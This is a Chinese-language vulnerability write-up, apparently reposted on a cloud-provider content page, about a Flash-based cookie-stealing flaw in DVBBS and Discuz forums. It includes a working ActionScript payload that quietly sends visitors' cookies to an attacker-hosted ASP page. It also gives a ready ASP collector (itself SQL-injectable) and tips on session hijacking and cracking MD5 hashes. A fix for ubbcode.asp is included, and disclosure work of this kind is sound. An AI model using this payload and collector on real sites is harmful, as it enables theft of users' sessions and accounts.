DVBBS等論壇存在Cookies偷取漏洞

來源:互聯網
上載者:User
cookie|cookies 灌水公司榮譽出品

◇ 此漏洞所涉及版本::
DVBBS、Discus所有版本,其它論壇未作測試,相信大多數都存在該漏洞


◇ 描述:
由於DVBBS等論壇對Flash採取直接播放形式,導致攻擊者可以利用Flash嵌入一段javascript代碼,達到偷取使用者Cookies的目的


◇ 具體分析與利用:
1. 首先準備好一個可以運行ASP的空間,用來存放Cookies
2. 建立一個Flash動畫,加入如下代碼:
onClipEvent (load) {
url="javascript:var rng=document.selection.createRange();rng.pasteHTML(\"<iframe name=frame_hide style='display:none'></iframe><img src=http://www.163design.net///"./images/logo.gif\\\" style=\\\"display:none\\\" onload=\\\"javascript:co=document.cookie;document.all.frame_hide.src='http://存放路徑/WriteCookies.asp?Cookies='+co.split('&');var e=document.all;for(var i=0;i<e.length;i++){if(e(i).tagName=='A'){var ss=e(i).outerHTML;}}\\\">\");"
getURL(url);
}
利用iframe是為了讓其它人查覺不到程式的頁面跳轉
3. 將Flash匯出為swf檔案,插入到想要偷取Cookies的論壇上,加入代碼 (注,有些論壇是[swf][/swf])
4. 這樣,如果有使用者進到貼子裡面,javascript程式就會把該使用者的Cookies送到WriteCookies.asp,儲存到資料庫
5. 至於Cookies欺騙,推薦使用IECookiesView,很多教程都有介紹,在這裡就不多說了


◇ 備忘
1. 對于禁用Flash的論壇,還可以利用PNG格式的圖片內嵌程式碼偷取
2. 拿到Cookies後,密碼是經MD5演算法加密過的字串,如果你喜歡用暴力的話,可以試試去解碼,當然,個人是不推薦這種方法的


◇ 解決方案:
1. 禁用Flash,或將Flash改為連結格式,以動網為例,修改INC/ubbcode.asp檔案

找到下面兩段
re.Pattern="(\[FLASH\])(.[^\[]*)(\[\/FLASH\])"
strContent= re.Replace(strContent,"<a href=""$2"" TARGET=_blank><IMG SRC=http://www.163design.net/a/a/pic/swf.gif border=0 alt=點擊開新視窗欣賞該FLASH動畫! height=16 width=16>[全屏欣賞]</a>
<OBJECT codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=500 height=400><PARAM NAME=movie value=""$2""><PARAM NAME=quality value=high><embed src=""$2"" quality=high pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash' type='application/x-shockwave-flash' width=500 height=400>$2</embed></OBJECT>")

re.Pattern="(\[FLASH=*([0-9]*),*([0-9]*)\])(.[^\[]*)(\[\/FLASH\])"
strContent= re.Replace(strContent,"<a href=""$4"" TARGET=_blank><IMG SRC=http://www.163design.net/a/a/pic/swf.gif border=0 alt=點擊開新視窗欣賞該FLASH動畫! height=16 width=16>[全屏欣賞]</a>
<OBJECT codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=$2 height=$3><PARAM NAME=movie value=""$4""><PARAM NAME=quality value=high><embed src=""$4"" quality=high pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash' type='application/x-shockwave-flash' width=$2 height=$3>$4</embed></OBJECT>")

改為
re.Pattern="(\[FLASH\])(.[^\[]*)(\[\/FLASH\])"
strContent= re.Replace(strContent,"<a href=""$2"" TARGET=_blank><IMG SRC=http://www.163design.net/a/a/pic/swf.gif border=0 height=16 width=16>[點擊開啟該Flash檔案]</a>")

re.Pattern="(\[FLASH=*([0-9]*),*([0-9]*)\])(.[^\[]*)(\[\/FLASH\])"
strContent= re.Replace(strContent,"<a href=""$4"" TARGET=_blank><IMG SRC=http://www.163design.net/a/a/pic/swf.gif border=0 height=16 width=16>[點擊開啟該Flash檔案]</a>")


2. 至於PNG圖片的問題,留給寫論壇的人自己去解決吧


◇ 附:儲存Cookies的簡單ASP代碼,如果想要加上其他功能,自己稍為修改一下就行了。
Set conn=Server.CreateObject("ADODB.Connection")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq="& Server.MapPath("CookiesLog.mdb")
Cookies=request("Cookies")
IP=request.serverVariables("remote_host")
sql="insert into co(Cookies,IP) values('"&Cookies&"','"&IP&"')"
conn.execute(sql)
set conn=nothing


◇ 廣告時間:
本漏洞由“灌水公司”全體工作人員發現,Flash代碼由余平編寫,文檔由小竹整理。
灌水公司提供專業級的網站程式開發,資料庫開發,收費支援人員、安全顧問服務

連絡方式:
QQ:48814 (小竹)
QQ組:1019634 (灌水公司)



相關文章

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。